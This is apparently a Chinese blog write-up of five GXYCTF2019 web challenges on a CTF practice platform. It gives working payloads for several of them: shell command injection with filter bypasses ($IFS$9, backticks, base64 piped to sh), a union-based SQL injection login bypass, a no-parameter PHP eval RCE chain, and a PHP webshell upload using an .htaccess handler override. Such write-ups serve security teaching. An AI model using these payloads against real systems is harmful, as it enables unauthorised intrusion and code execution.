GXYCTF2019_Web_wp

最新推荐文章于 2024-08-10 18:49:59 发布
最新推荐文章于 2024-08-10 18:49:59 发布
阅读量728 收藏
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45628145/article/details/106546980
版权

Ping Ping Ping


根据题名,和这个/?ip=就知道是个命令执行题了,ping一下看看

接下来ls一下看看

发现有flag.phpindex.php两个文件,那就cat它们一下看看

这里发现空格被ban了,回显fxck your space!,这里可以用$IFS$9进行绕过,得到index.php的内容

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "
";
  print_r($a);
}

发现flag连在一起的话也会被ban,导致这里无法直接读取 flag.php,然后就有一大堆花样操作了,首先就是
变量拼接

?ip=127.0.0.1;q=lag;cat$IFS$9f$q.php

内联执行

?ip=127.0.0.1;cat$IFS$9`ls`

内联执行就是把反引号的命令的输出当作输入执行
用sh

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

BabySQli

一个登陆框,试了一下根据回显判断用户名是admin

admin'报错

万能密码admin' or 1=1 #得到回显

测试之后发现是小写的or=被ban了,查下字段
admin'Order by 4#,报错,存在3个字段

本来想看数据库的,但是()都被ban了,发现search.php里面有一段字符串base32->base64之后得到

select * from user where username = '$name'

这个题目也是有点坑,BUU有一个hint没有传上来,原题是说了密码时md5加密的,这里利用union查询并不存在的数据时,就会构造一个虚拟的数据,这个登录的判断过程应该是在登录的时候先查询用户名对不对,再查询密码对不对,这里在用户名框先输入一个不存在的用户名,然后输入我们构造的密码就可以成功登陆了,也就是payload

qqq'unIon Select 1,'admin','c4ca4238a0b923820dcc509a6f75849b'#
1

得到flag

禁止套娃

备份文件扫描到.git/config.git源码泄露,用Githack.py把源码下载下来,注意用python2

python2 Githack.py http://9eaddafb-6e0f-46a7-83a6-02ea1b554888.node3.buuoj.cn/.git/

得到index.php

<?php
include "flag.php";	//有一个flag.php
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
    //过滤掉了很多伪协议
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
        /*
        	无参数RCE,限制输入只能为两种
        	a(b(c()));
			a();
        */
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
            //过滤了一些关键字,很多函数用不了
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

有一个flag.php,现在也不能拿到shell,只有读取flag.php文件
首先就是读取文件了,因为et被ban了,所以用不了file_get_contents()了,但是可以用readfile()highlight_file()show_source()
print_r(scandir('.'))查看目录,下一步,构造.,这里用到localeconv()函数
localeconv() 函数返回一包含本地数字及货币格式信息的数组,而数组第一项就是.
再用current()函数,初始指向插入到数组中的第一个元素,也就是默认指向.,也可以用current()函数的别名pos()
现在就可以看得到目录的内容了,print_r(scandir(pos(localeconv())));注意要加分号,因为最后执行的是eval($_GET[‘exp’]);

然后就是想办法怎么读到flag.php,也就是倒数第二项了,几个函数
array_reverse():已相反的顺序返回数组
array_flip():交换数组的键和值
array_rand():返回一个包含随机键名的数组
然后就有很多种操作了
payload1

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

逆序,取next()

payload2

?exp=print_r(array_rand(array_flip(scandir(current(localeconv())))));

payload3
还有一种骚操作是用session_id(session_start()),设置PHPSESSID的cookie为flag.php
session_start()告诉php使用session,php默认是不主动使用session的,再通过session_id()得到当前的session id

BabyUpload

文件上传题

测试发现image/jpeg可以上传,而且文件不能太大,上传的时候注意改一下

上传一个php看看

把php和phtml都给ban了,测试发现文件内的<?也被ban了

但这个好绕过,<script language="php"></script>就好了,这里我是想用Apache的文件解析漏洞,传一个php.aa结尾的木马,然后访问,但是没有执行,而是返回了代码,所以再传一个htaccess文件,内容

<FilesMatch "aa">
	SetHandler application/x-httpd-php
</FilesMatch>

意思是把aa当作php文件执行,但这里也不需要设置这个aa了,随便传一个什么123.aa,不用123.php.aa,因为没用到Apache的文件解析漏洞

StrongestMind


一个计算器,提交答案,提交成功一千次获得flag,上脚本

# -*- coding: utf-8 -*-
import requests
import re
import time

url = "http://324d5a76-f2d1-4a53-9e68-b94654223b38.node3.buuoj.cn/"
s = requests.session()  #会话保持
source = s.get(url)
equation = re.findall(r'\d+.[+-].\d+', source.text) #算式正则
asw = eval(equation[0])
s.post(url,data={"answer":asw})
for i in range(0,1010):
    equation = re.findall(r'\d+.[+-].\d+', source.text) #算式正则
    asw = eval(equation[0])
    print(asw,i)#运行的时候看的见效果
    source = s.post(url,data={"answer":asw})
    time.sleep(0.01)
print(source.text)

注意sleep一下,不然题目环境会出问题,请求太快了,跑完就得到flag了,设置1010是防止出错了,但原则上是不会出错的

秋风瑟瑟...
关注
[GWCTF 2019]枯燥的抽奖 -wp
freerats的博客
08-13 394
查看一下源代码 有个check.php,访问一下(无脑扫的话大概率也能扫出来) xkcsYlwV6M <?php #这不是抽奖程序的源代码!不许看! header("Content-Type: text/html;charset=utf-8"); session_start(); if(!isset($_SESSION['seed'])){ $_SESSION['seed']=rand(0,999999999); } mt_srand($_SESSION['seed']); $str_long1
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3712
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUOJ-[GXYCTF2019]-WEB-WP
会下雪的晴天
09-13 1155
平台地址:https://buuoj.cn/ 目录Ping Ping PingBabySQli禁止套娃 Ping Ping Ping 知识点:RCE,空格及过滤的一些基本绕过 提示GET ip,应该是RCE了,ls看看有啥 尝试cat一下,发现过滤了空格,绕过一下,过滤了flag,哈哈看来不是这么简单啊,读一下源码吧 空格绕过可以用这些字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 等 试了试好像只有$I.
buuctf-[GXYCTF2019]禁止套娃1-详解-无参数rce
最新发布
chinese_cabbage0的博客
08-10 256
讲解了buuctf的[GXYCTF2019]禁止套娃题目的解题过程,非常详细,附有两种解题方法
[GXYCTF2019]禁止套娃 WP
Yang_99的博客
08-06 426
1.第一步是.git文件泄露 用GitHack.py跑一下得到源码index.php 2.读源码 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) { if(';' === preg_replace('/[a-z,_]
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-27 240
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
[GXYCTF2019]StrongestMind
m0_62905261的博客
07-28 210
[GXYCTF2019]StrongestMind
Buuctf web题 [GXYCTF2019]BabySQli WP
alatan9的博客
02-09 98
账号1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'尝试后发现select 1,2,3 1是账号 3是密码 2不知道是啥。发现一串密码由于多数的大写字母怀疑是base32 解密。我们可以利用union select来创建一个临时账号。需要工具的可以私聊我 技术问题也可以私聊。解密后发现是base64 再次解密。发现到4报错 说明数据库只有三列。应该是sql注入先爆破出账号。发现过滤order 尝试绕过。发现账号是admin。
【BUU】[GXYCTF2019]BabyUpload
qi_SJQ_的博客
02-07 767
1.本题知识: 图片尺寸小于2000字节,但对文件头没有检验。 检验content-type且只能为jp(e)g,png与gif都不行。 .htaccess配置文件替换。 过滤了一些敏感函数,以及php声明绕过,ph后缀过滤后好像没办法绕过去上传php文件。 2.别人的wp很详尽,我就对被拦截的情况来阐述吧: 后缀名不能有ph:我们后缀只能为jpg上传,但没有文件包含函数可以利用,图片马上传上去没用。因此就可以尝试.htaccess文件替换来将任意后缀解析为php。 AddType applicat
[ctf web]从 [GXYCTF2019]禁止套娃 开始的无参数函数RCE
ShenZ的博客
08-15 344
无参数函数RCE [GXYCTF2019]禁止套娃 wp 无参数函数RCE sky大佬yyds!rce一定要看大佬的文章!!link
Web_SQL注入(1)
Lemon's blog
07-15 617
[GYCTF2020]Blacklist ——涉及新知识HANDLER ... OPEN等、堆叠注入 这道题和之前做那道强网杯的题目一样,但之前的方法比如读取flag时改表名或者是用SQL的预处理进行绕过都不可行了,因为过滤了set prepare alter rename 所以这里就涉及到了一种新的方法 HANDLER ... OPEN语句打开一个表,使其可以使用后续HANDLER ... READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER ... CLOSE或会话终止之前不会关
GXY-CTF
qq_43235406的博客
01-13 1159
title: GXY_CTF date: 2019-12-25 21:55:30 tags: [“CTF”] categories: [“技术”] 这次是北京工业大学的比赛,题目很基础,自己也比较菜???? 佛系青年 说下感悟,这道题的txt文本是损坏的,所以正常的解法是用16进制软件打开,然后吧txt里的内容另存为。 但是以前一次偶然的机会,我在电脑里安装了一种解压软件–解压专家,用其打开,可以恢...
RCTF 2019 web
weixin_30337157的博客
05-23 184
写在正文前 神仙题,压根不会。 听说跟着神仙的思路走一遍印象会深点,Just mo it 。2333 正文 nextphp 整体思路:phpinfo得知存在preload.php文件,并与opcache拓展有关,查看preload.php源码确定为反序列化漏洞。 题目直接给了一句话,起手不俗,tql eval能干啥?执行php代码:读取文件,命令执行...... 附上一篇...
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
2302_79800344的博客
03-03 1989
代码中并没有写传统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件。
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 896
对于文件上传一般就是先找到可以上传的文件类型,然后看传上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
EEPROM_WP_Pin
07-27
EEPROM_WP_Pin是一个常见的术语,它通常用于描述电子设备中的一个引脚或接口。EEPROM代表可擦写可编程只读存储器(Electrically Erasable Programmable Read-Only Memory),WP代表写保护(Write Protect)。因此,EEPROM_WP_Pin是指用于控制EEPROM写保护功能的引脚。当该引脚处于写保护状态时,将禁止对EEPROM进行写入操作,以保护存储的数据不被修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值